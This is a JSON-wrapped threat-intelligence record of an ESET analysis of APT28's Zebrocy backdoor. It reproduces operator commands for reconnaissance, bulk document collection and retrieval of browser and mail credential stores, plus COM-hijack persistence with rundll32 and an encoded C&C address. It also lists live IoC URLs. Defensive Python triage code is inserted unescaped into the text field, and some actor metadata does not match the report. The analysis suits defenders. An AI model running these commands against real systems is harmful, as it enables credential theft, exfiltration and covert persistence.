{
	"id": "e47ff77c-4efa-4088-b117-d1896c3da7cc",
	"created_at": "2026-04-06T00:18:22.121671Z",
	"updated_at": "2026-04-10T13:12:42.26166Z",
	"deleted_at": null,
	"sha1_hash": "b6ae0db93e7425fe38ec31e89a9508fb68d1a06d",
	"title": "A journey to Zebrocy land",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 374292,
	"plain_text": "A journey to Zebrocy land\r\nBy ESET Research\r\nArchived: 2026-04-05 20:34:15 UTC\r\nWhat happens when a victim is compromised by a backdoor and the operator is controlling it? It’s a difficult question that is\r\nnot possible to answer entirely by reverse engineering the code. In this article we will analyze commands sent by the\r\noperator to their targets.\r\nThe Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – has been operating since at least 2004 and\r\nhas made headlines frequently in past years.\r\nRecently, we unveiled the existence of a UEFI rootkit, called LoJax, which we attribute to the Sednit group. This is a first\r\nfor an APT group, and shows Sednit has access to very sophisticated tools to conduct its espionage operations.\r\nThree years ago, the Sednit group unleashed new components targeting victims in various countries in the Middle East and\r\nCentral Asia. Since then, the number and diversity of components has increased drastically. ESET researchers and\r\ncolleagues from other companies have documented these components; however, in this article we will focus on what's\r\nbeyond the compromise, what the operators do once a victim system is running a Zebrocy Delphi backdoor.\r\nThe bear’s bait\r\nAt the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs\r\nthat delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing.\r\nHowever, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it\r\nhad used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social\r\nengineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the\r\nshortened URL used in this campaign.\r\nFigure 1. 
Statistics of the Bitly URL\r\nAbout 20 clicks were recorded on this link in the same week the URL was created, and these presumably downloaded the target archive. Keep in mind that this may mean fewer than 20 potential victims, as a victim may have clicked the URL twice or more because the outcome was not what they expected, as described below.\r\nWhile ESET telemetry indicates that this URL was delivered by spearphishing emails, we do not have a sample of such an email. The shortened URL leads the victim to an IP-address-based URL where the archived payload is hosted. Without the email message, we do not know whether it contained instructions for the user or further social engineering, or whether it relied solely on the victim’s curiosity. The archive contains two files: an executable and a decoy PDF document.\r\nhttps://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/\r\nPage 1 of 7\r\nFigure 2. Files extracted from the archive (Google Translate suggests “CATALOGUE - (2018).exe” and “Order 97.pdf” from the Ukrainian)\r\nNote the typo in the executable’s filename: it should be “ДОВIДНИК” rather than “ДОВIДНIК”. Once the binary is executed, a password prompt opens. The password validation always fails, but after the apparent validation attempt the decoy PDF document is opened. That document appears to be empty, while the downloader, written in Delphi, keeps running in the background. The same IP address appears in the URL hardcoded into this first-stage downloader.\r\nThe bear’s lair\r\nThe Stage-1 downloader downloads and executes a second downloader, written in C++ and as straightforward as the group’s other Zebrocy downloaders. 
It generates a victim ID and then downloads the main backdoor, this time written in Delphi.\r\nAs we explained in our most recent blogpost about Zebrocy, the configuration of the backdoor is stored in the resource section and is split into four hex-encoded, encrypted blobs, each holding a different part of the configuration.\r\nFigure 3. Overview of the resource section\r\nOnce the backdoor has sent basic information about the newly compromised system, the operators take control of it and start sending commands right away. The time between the victim running the downloader and the operators’ first commands is therefore only a few minutes.\r\nHow the bear hunts\r\nIn this section we describe in more detail the commands the operators issue manually through their Delphi backdoor.\r\nThe available commands are listed in one of the configuration blobs mentioned earlier (the \"commands\" blob in Figure 3). The number of supported commands has grown over time; the latest version of the backdoor supports more than thirty. As we did not identify a pattern in the order in which the commands are invoked, we believe the operators execute them manually.\r\nThe first set of commands gathers information about the victim’s computer and environment:\r\nCommand        Arguments\r\nSCREENSHOT     None\r\nSYS_INFO       None\r\nGET_NETWORK    None\r\nSCAN_ALL       None\r\nThe commands above are commonly executed when the operators first connect to a newly activated backdoor. They take no arguments and are self-explanatory. 
Other commands commonly seen shortly after these backdoors are activated are listed below:\r\nCommand                Arguments\r\nREG_GET_KEYS_VALUES    HKEY_CURRENT_USER\r\n                       Software\\Microsoft\\Windows\\CurrentVersion\r\nDOWNLOAD_DAY(30)       c:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;\r\n                       *.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;\r\n                       d:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;\r\n                       *.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;\r\nDOWNLOAD_DAY(1)        c:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg\r\n                       *.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;\r\n                       d:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg\r\n                       *.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;\r\nCMD_EXECUTE            echo %APPDATA%\r\n                       ipconfig /all\r\n                       netstat -aon\r\nCMD_EXECUTE            wmic process get Caption,ExecutablePath\r\n                       reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /s\r\nThe DOWNLOAD_DAY(1) argument is reproduced as printed, including the missing separators between *.jpg and *.jpeg and between *.bmp and *.rar.\r\nReaders of our previous articles about Zebrocy will notice that more or less the same kind of information is sent over and over again by the earlier stages. This information is requested within a few minutes of initial compromise, and the amount of data the operators have to deal with is considerable.\r\nTo collect even more information, the Zebrocy operators from time to time upload and run credential dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group.\r\n
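The DOWNLOAD_DAY arguments above are a flat list: a drive root followed by ';'-separated globs, then the next drive root. The following is an added example, not code from the original article, that parses that format and replays the selection over a constructed file inventory. It assumes (the page does not say so) that the number in DOWNLOAD_DAY(N) is a window of N days on file modification time, and it uses fnmatch globbing as a stand-in for whatever matching the backdoor implements. It copies the DOWNLOAD_DAY(1) list as printed, treating the printed line wrap as no separator (the 30-day list carries its ';' before each wrap), which collapses *.jpg, *.jpeg, *.bmp and *.rar into one glob that no ordinary filename satisfies; if the page reproduces the operator's command faithfully, the one-day sweep silently skips those four types.

```python
# Added example (not code from the ESET article): parse the argument string
# of Zebrocy's DOWNLOAD_DAY command and replay its file selection over a
# constructed file inventory. Assumption, not stated on the page: the integer
# in DOWNLOAD_DAY(N) is a modification-time window of N days.
import fnmatch
import ntpath
from datetime import datetime, timedelta

# Argument strings as printed in the article, with the printed line wraps
# removed (assumed not to be separators, since the day-30 list has ';' before
# each wrap). The day-1 list keeps its missing separators around
# *.jpg, *.jpeg, *.bmp and *.rar exactly as printed.
DAY30_ARG = ('c:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;'
             '*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;'
             'd:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;'
             '*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;')
DAY1_ARG = ('c:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg'
            '*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;'
            'd:\\*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg'
            '*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;')


def parse_download_day(arg):
    # Returns {drive: [glob, ...]}. Tokens are ';'-separated; a token that
    # starts with a drive root (c:\\ or d:\\ in the article) opens a new section.
    spec = {}
    drive = None
    for tok in arg.split(';'):
        tok = ''.join(tok.split())          # drop any wrap whitespace
        if not tok:
            continue
        drive_part, rest = ntpath.splitdrive(tok)
        if drive_part:                      # 'c:' + '\\*.doc' -> new section
            drive = drive_part.lower()
            spec.setdefault(drive, [])
            tok = rest.lstrip(ntpath.sep)
        if drive is None:
            raise ValueError('glob before any drive root: ' + tok)
        spec[drive].append(tok)
    return spec


def select_files(spec, inventory, days, now):
    # Returns the paths the command would collect from inventory, a list of
    # (path, mtime): drive listed in the spec, file name matching one of that
    # drive's globs (case-insensitive, as on NTFS) and mtime within the window.
    cutoff = now - timedelta(days=days)
    hits = []
    for path, mtime in inventory:
        drive = ntpath.splitdrive(path)[0].lower()
        name = ntpath.basename(path).lower()
        globs = spec.get(drive, [])
        if mtime >= cutoff and any(fnmatch.fnmatchcase(name, g.lower()) for g in globs):
            hits.append(path)
    return hits


# Constructed inventory (not from the article); NOW is an arbitrary reference time.
NOW = datetime(2018, 9, 1, 12, 0)
INVENTORY = [
    ('C:\\Docs\\report.docx', NOW - timedelta(days=2)),
    ('C:\\Desk\\order.pdf', NOW - timedelta(hours=5)),
    ('C:\\Pictures\\scan.jpg', NOW - timedelta(hours=3)),
    ('D:\\Backup\\archive.rar', NOW - timedelta(days=10)),
    ('C:\\Docs\\old.xls', NOW - timedelta(days=90)),          # outside 30 days
    ('E:\\Stick\\notes.pdf', NOW - timedelta(days=1)),        # drive not listed
    ('C:\\Windows\\System32\\kernel32.dll', NOW - timedelta(days=1)),
]

if __name__ == '__main__':
    for label, arg, days in (('DOWNLOAD_DAY(30)', DAY30_ARG, 30), ('DOWNLOAD_DAY(1)', DAY1_ARG, 1)):
        spec = parse_download_day(arg)
        print(label, sorted(spec), 'globs on c: =', len(spec['c:']))
        for hit in select_files(spec, INVENTORY, days, NOW):
            print('  would collect', hit)
```

Run as a script it lists what each command would have collected from the inventory: the 30-day sweep picks up the .jpg and the .rar, while the 1-day sweep returns only the .pdf, even though the .jpg was modified hours ago.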
In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser) and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016:\r\nCommand                    Arguments\r\nUPLOAD_AND_EXECUTE_FILE    C:\\ProgramData\\Office\\MS\\msoffice.exe\r\n                           […]\r\n                           4D5A9000… (the hex-encoded executable, starting with its MZ header)\r\nThese dumpers create log files indicating the presence or absence of potential databases to dump:\r\nCommand          Arguments\r\nDOWNLOAD_LIST    C:\\ProgramData\\Office\\MS\\out.txt\r\n                 C:\\ProgramData\\Office\\MS\\text.txt\r\nThe current dumper produces the following output when there are no databases to dump:\r\n%LOCALAPPDATA%\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data not found\r\n%LOCALAPPDATA%\\Chromium\\User Data\\Default\\Login Data not found\r\n%LOCALAPPDATA%\\7Star\\7Star\\User Data\\Default\\Login Data not found\r\n%LOCALAPPDATA%\\CentBrowser\\User Data\\Default\\Login Data not found\r\nThese dumpers are removed as soon as they have done their job. Moreover, the backdoor contains a list of credential-store filenames from the software listed below (database names):\r\nkey3.db        Firefox private keys (now named key4.db)\r\ncert8.db       Firefox certificate database\r\nlogins.json    Firefox encrypted password database\r\naccount.cfn    The Bat! (email client) account credentials\r\nwand.dat       Opera password database\r\nThe operators make a point of retrieving these databases if they are present on the victim’s computer:\r\nCommand          Arguments\r\nDOWNLOAD_LIST    %APPDATA%\\The Bat!\\Account.CFN\r\n                 %APPDATA%\\The Bat!\\[REDACTED]\\Account.CFN\r\nThe operators retrieve these files with the DOWNLOAD_LIST command, which is used when they already know that interesting files are present on the computer.\r\nFinally, depending on how interesting the victim is, the malware operators may deploy another custom backdoor. 
This backdoor is executed via the CMD_EXECUTE command:\r\nCommand        Arguments\r\nCMD_EXECUTE    reg add \"HKCU\\Software\\Classes\\CLSID\\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\" /ve /d \"Reliability Maintenance Control Panel\" /\r\n               rundll32.exe \"%APPDATA%\\Microsoft\\WinSupport\\RMC\\mtrcpl.dll\",#1 687474703A2F2F[REDACTED]\r\n               dir /s /b /o:gn %APPDATA%\\Microsoft\\\r\nThere are some interesting facts here. First, the operators use COM object hijacking (a per-user CLSID registration under HKCU\\Software\\Classes, which Windows consults ahead of the machine-wide HKLM entry for that user) to make the malware persistent, even though the custom backdoor stays installed for only a few hours. Second, the hex-encoded string passed to rundll32 is the C\u0026C address used by the custom backdoor (687474703A2F2F decodes to “http://”), whereas in the common Delphi backdoor the C\u0026C is embedded in the configuration.\r\nThe two Delphi backdoors, the common one and the one above, are quite similar but differ in these respects:\r\n                            Delphi backdoor     Downloaded Delphi backdoor\r\nDelphi compiler version     14.0-15.0           32.0\r\n32/64-bit                   32-bit              64-bit\r\nConfiguration location      resource section    no config (C\u0026C is passed as an argument)\r\nNumber of commands          5                   3\r\nEncryption algorithm        AES ECB             custom\r\nLifetime on the computer    a few days          a few hours\r\nOnce again, it is not very clear what the purpose of this custom backdoor is. Its detection ratio is definitely lower than that of the “usual” backdoor, and the very short time it spends on the system makes it harder to retrieve: once the operators have finished, they quickly remove it.\r\nSummary\r\nObserving the commands operators use in the wild is quite interesting. They gather a considerable amount of information on the compromised target and are not worried about duplicated data. This shows a large gap between the development strategy and what the operators do in practice.\r\n
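As an added example (not code from the ESET article or from the Zebrocy operators), the check below turns the three observations from the custom-backdoor command lines in the previous section into a triage routine for process command lines: a reg add under HKCU\\Software\\Classes\\CLSID (the per-user COM registration behind the hijack), rundll32 invoking an ordinal export from a DLL under %APPDATA%, and a hex-encoded argument that decodes to printable text. The sample lines are constructed: the first three follow the article's commands (the reg add line is truncated on the page and is reproduced as printed), a placeholder host stands in for the redacted C&C, and two benign lines serve as controls. The tokenizer is a simplified model of cmd.exe quoting, and the substring 'appdata' in the DLL path is a heuristic for user-writable locations.

```python
# Added example (not code from the ESET article): triage operator command
# lines for the persistence pattern shown in the article. A 'reg add' under
# HKCU\\Software\\Classes\\CLSID registers a per-user COM class that Windows
# consults ahead of the machine-wide HKLM entry for that user (COM hijacking),
# and rundll32 then loads an ordinal export from a DLL under %APPDATA% with a
# hex-encoded argument. The sample command lines below are constructed; the
# C&C host is a placeholder for the value the article redacts.
import ntpath
import uuid

CLSID_USER_ROOT = 'hkcu\\software\\classes\\clsid' + ntpath.sep
HEX_DIGITS = set('0123456789abcdefABCDEF')


def tokenize(cmdline):
    # Minimal cmd.exe-style tokenizer: split on whitespace outside double
    # quotes, drop the quotes, leave backslashes alone (cmd does not treat
    # them as escapes). Assumption: good enough for the lines triaged here.
    toks, cur, quoted = [], '', False
    for ch in cmdline:
        if ch == '\"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                toks.append(cur)
            cur = ''
        else:
            cur += ch
    if cur:
        toks.append(cur)
    return toks


def decode_hex_argument(token):
    # Zebrocy passed the custom backdoor's C&C as a hex string; the article
    # shows it begins 687474703A2F2F, which is 'http://'. Returns the decoded
    # text, or None when the token is not even-length hex or not printable ASCII.
    if len(token) < 8 or len(token) % 2 or not set(token) <= HEX_DIGITS:
        return None
    raw = bytes.fromhex(token)
    if not all(32 <= b < 127 for b in raw):
        return None
    return raw.decode('ascii')


def triage(cmdline):
    # Returns a list of findings for one command line; empty means nothing
    # matched. Three checks, in order: per-user CLSID registration, rundll32
    # ordinal export from a user-writable path, hex-encoded argument.
    toks = tokenize(cmdline)
    if not toks:
        return []
    findings = []
    exe = ntpath.basename(toks[0]).lower()
    if exe in ('reg', 'reg.exe') and len(toks) > 2 and toks[1].lower() == 'add':
        key = toks[2].lower()
        if key.startswith(CLSID_USER_ROOT):
            clsid = key[len(CLSID_USER_ROOT):].split(ntpath.sep, 1)[0]
            try:
                uuid.UUID(clsid.strip('{}'))   # only flag a well-formed CLSID
                findings.append('com-hijack: per-user CLSID registration ' + clsid.upper())
            except ValueError:
                pass
    if exe in ('rundll32', 'rundll32.exe') and len(toks) > 1:
        dll, _, entry = toks[1].partition(',')
        # 'appdata' covers both %APPDATA% and an expanded ...\\AppData\\... path
        if 'appdata' in dll.lower() and entry.startswith('#'):
            findings.append('rundll32: ordinal export ' + entry + ' from user-writable path ' + dll)
    for tok in toks[1:]:
        decoded = decode_hex_argument(tok)
        if decoded is not None:
            findings.append('hex-encoded argument decodes to ' + decoded)
    return findings


# Constructed samples: the first three follow the article's CMD_EXECUTE lines
# (the reg add line is truncated on the page and reproduced as printed); the
# hex C&C is a placeholder host encoded here; the last two are benign controls.
C2_HEX = 'http://c2.example.invalid/cb'.encode().hex().upper()
SAMPLE_COMMANDS = [
    'reg add \"HKCU\\Software\\Classes\\CLSID\\{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}\" /ve /d \"Reliability Maintenance Control Panel\" /',
    'rundll32.exe \"%APPDATA%\\Microsoft\\WinSupport\\RMC\\mtrcpl.dll\",#1 ' + C2_HEX,
    'dir /s /b /o:gn %APPDATA%\\Microsoft' + ntpath.sep,
    'rundll32.exe shell32.dll,Control_RunDLL',
    'reg add HKCU\\Software\\Contoso /v Flag /d 1',
]

if __name__ == '__main__':
    for cmd in SAMPLE_COMMANDS:
        print(cmd)
        for finding in triage(cmd):
            print('   ->', finding)
```

Feeding real process-creation events through triage() needs only the command-line field; the CLSID check is the high-signal one, because legitimate software rarely registers COM classes per user from a command line, while the hex-argument check is there to surface the C&C without waiting for network telemetry.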
Backdoors with custom configuration and modules are deployed very carefully, which indicates that precautions are taken to avoid ending up in the hands of researchers.\r\nThe first set of commands is always the same and is executed within a very short timeframe, which raises another question: is it automated?\r\nIndicators of Compromise (IoCs)\r\nDistribution URL\r\nhttp://45.124.132[.]127/DOVIDNIK - (2018).zip\r\nC\u0026C server\r\nhttp://45.124.132[.]127/action-center/centerforserviceandaction/service-and-action.php\r\nSHA-1                                       ESET detection name\r\n48f8b152b86bed027b9152725505fbf4a24a39fd    Win32/TrojanDownloader.Sednit.CMT\r\n1e9f40ef81176190e1ed9a0659473b2226c53f57    Win32/HackTool.PSWDump.D\r\nbfa26857575c49abb129aac87207f03f2b062e07    Win32/PSW.Agent.OGE\r\nMITRE ATT\u0026CK techniques\r\nTactic               ID     Name                                           Description\r\nInitial Access       T1192  Spearphishing Link                             Spearphishing emails using a URL-shortener service to trick the victim into clicking a link to a zip file containing malicious files.\r\nExecution            T1204  User Execution                                 Tricks users into running an executable with an icon that looks like a Microsoft Word document.\r\nExecution            T1085  Rundll32                                       rundll32.exe has been used to run a newly downloaded malicious DLL.\r\nExecution            T1047  Windows Management Instrumentation             WMI commands to gather victim host details.\r\nExecution            T1053  Scheduled Task                                 Scheduled task to execute malicious binaries.\r\nPersistence          T1060  Registry Run Keys / Startup Folder             Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run used for persistence.\r\nPersistence          T1122  Component Object Model Hijacking               COM hijacking for persistence.\r\nDefense Evasion      T1107  File Deletion                                  Deletes files (binaries and files created) after usage.\r\nDefense Evasion      T1089  Disabling Security Tools                       Kills processes.\r\nDiscovery            T1012  Query Registry                                 Registry key enumeration.\r\nDiscovery            T1057  Process Discovery                              Lists running processes.\r\nDiscovery            T1082  System Information Discovery                   Uses the systeminfo command to gather information about the victim.\r\nDiscovery            T1083  File and Directory Discovery                   Uses echo on environment variables and dir to list directory contents.\r\nCollection           T1005  Data from Local System                         Scans files that match extensions listed in the malware.\r\nCollection           T1039  Data from Network Shared Drive                 Enumerates remote and local drives and then exfiltrates files matching specific extensions.\r\nCollection           T1025  Data from Removable Media                      Enumerates remote and local drives and then exfiltrates files matching specific extensions.\r\nCollection           T1074  Data Staged                                    Creates a file containing the paths of all files to exfiltrate.\r\nCollection           T1056  Input Capture                                  Keylogger feature.\r\nCollection           T1113  Screen Capture                                 Screenshot feature.\r\nExfiltration         T1020  Automated Exfiltration                         Automatically prepares a file with all file paths to retrieve and sends it.\r\nExfiltration         T1022  Data Encrypted                                 Data sent are hex-encoded and encrypted with a known algorithm or a custom one.\r\nExfiltration         T1041  Exfiltration Over Command and Control Channel  Data are exfiltrated to a C\u0026C server.\r\nCommand and Control  T1043  Commonly Used Port                             Downloaders and backdoors use ports 80 or 443 to communicate with the C\u0026C server.\r\nCommand and Control  T1024  Custom Cryptographic Protocol                  Data sent are hex-encoded and encrypted with AES or a custom algorithm.\r\nCommand and Control  T1132  Data Encoding                                  Data sent are hex-encoded and encrypted with a known algorithm or a custom one.\r\nCommand and Control  T1001  Data Obfuscation                               Data sent are hex-encoded and encrypted with a known algorithm or a custom one.\r\nCommand and Control  T1008  Fallback Channels                              A fallback C\u0026C server is embedded in the configuration.\r\nCommand and Control  T1079  Multilayer Encryption                          Data sent are hex-encoded and encrypted with a known algorithm or a custom one.\r\nCommand and Control  T1071  Standard Application Layer Protocol            HTTP and HTTPS are used to communicate.\r\nCommand and Control  T1032  Standard Cryptographic Protocol                Data sent are hex-encoded and encrypted with a known algorithm or a custom one.\r\nSource: https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"
	],
	"report_names": [
		"journey-zebrocy-land"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
